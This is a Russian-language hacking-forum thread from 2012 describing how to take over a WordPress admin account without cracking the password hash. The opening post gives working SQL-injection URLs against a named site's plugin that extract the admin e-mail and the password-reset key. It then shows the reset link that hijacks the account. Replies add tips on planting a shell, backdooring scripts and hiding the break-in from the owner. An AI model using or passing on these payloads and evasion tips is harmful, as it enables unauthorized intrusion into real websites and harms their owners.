ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Статьи (https://forum.antichat.xyz/forumdisplay.php?f=30)
-   -   Получаем доступ в админку Wordpress без расшифровки хэша (https://forum.antichat.xyz/showthread.php?t=359532)

MaxFast 07.11.2012 16:56

Приветствую. Решил написать небольшую заметку.

Как вы знаете чтобы зайти в админ-панель Wordpress, нужно расшифровать хэш администратора.

Но я понял как входить в панель без ожидания расшифровки хэша.

Покажу на примере.

У нас есть блог, где мы уже вывели данные из таблицы wp_users.

Торопится выводить пароль не стоит, выведем e-mail администратора:

Код:

http://www.abbdi.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+union+select+1,2,3,group_concat(user_login,0x3a,user_emai),5,6,7,8,9,10,11+from+wp_users--
И результат запроса:

Цитата:

Сообщение от None
admin:hackingmaster94@gmail.com

Так. Теперь идем на страницу авторизации wp-login.php, и переходим на страницу восстановления пароля (В нашем случае Passwort vergessen).

Вводим e-mail администратора который мы получили выше, и отправляем письмо.

Пол дела мы сделали. Особенность Wordpress такова, что код подтверждения записывается в БД.

Делаем такой запрос:

Код:

http://www.abbdi.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+union+select+1,2,3,group_concat(user_login,0x3a,user_activation_key),5,6,7,8,9,10,11+from+wp_users--
И в результате мы получаем активационный код:

Цитата:

Сообщение от None
P6rd7g1bPW28zgbPCRtZ

Теперь идем на страницу сброса пароля (При этом заполнив параметры):

Код:

www.abbdi.com/wp-login.php?action=rp&key=P6rd7g1bPW28zgbPCRtZ&login=admin
И мы видим что нам предлагают ввести новый пароль, вводим, и меняем.

Далее привычная авторизация.

Ну вот и все. Есть некоторое примечание, этот способ может не работать на тех блогах, где отключен mail().

Способ работает не везде.

(с) MaxFast

cLauZ 07.11.2012 17:06

Аммм...сорри ТС а для какой версии WP?

И как получить хэш для версии 3.4.1

MaxFast 07.11.2012 17:10

Цитата:

Сообщение от cLauZ
Аммм...сорри ТС а для какой версии WP?
И как получить хэш для версии 3.4.1

Ну я тестировал на 3.2.1.

Все данные я вытянул с помощью SQL Injection в плагине.

Prosta4ok 07.11.2012 17:32

Цитата:

Сообщение от cLauZ
Аммм...сорри ТС а для какой версии WP?

работает на всех версиях, нужна только раскрученная sql инъекция или доступ к БД. единственное что факт взлома скорее всего заметят..

martmm 07.11.2012 17:45

ТС скажи пожайлуста как я понял то даже хеша пароля не нужно знать?

MaxFast 07.11.2012 17:47

Цитата:

Сообщение от martmm
ТС скажи пожайлуста как я понял то даже хеша пароля не нужно знать?

Пароль знать не нужно, да.

Главное узнать e-mail, и активационный код.

Alexey_S 07.11.2012 18:09

Цитата:

Сообщение от Prosta4ok
работает на всех версиях, нужна только раскрученная sql инъекция или доступ к БД. единственное что факт взлома скорее всего заметят..

если шел зальешь, базу можно будет вернуть в исходное состояние.

Serafim 07.11.2012 18:13

Цитата:

Сообщение от Alexey_S
если шел зальешь, базу можно будет вернуть в исходное состояние.

И удалить письмо с восстановлением пароля с почты владельца?

Alexey_S 07.11.2012 18:22

Цитата:

Сообщение от Serafim
И удалить письмо с восстановлением пароля с почты владельца?

Он может его и не прочитать, как повезет.Но если оставить как написано в первом посте, факт обнаружения выше.

blesse 07.11.2012 19:01

Хм спасибо извлек для себя новое)А по поводу палева-если цель не очень то может и админ оказаться не совсем компетентным просто вернуть пасс обратно и забэкдорить какой нить скрипт авось и не заметит)

А если какойнибудь крупный сайт то тут уж и денег не жалко ящик его проспамить. Лови +++


Время: 20:31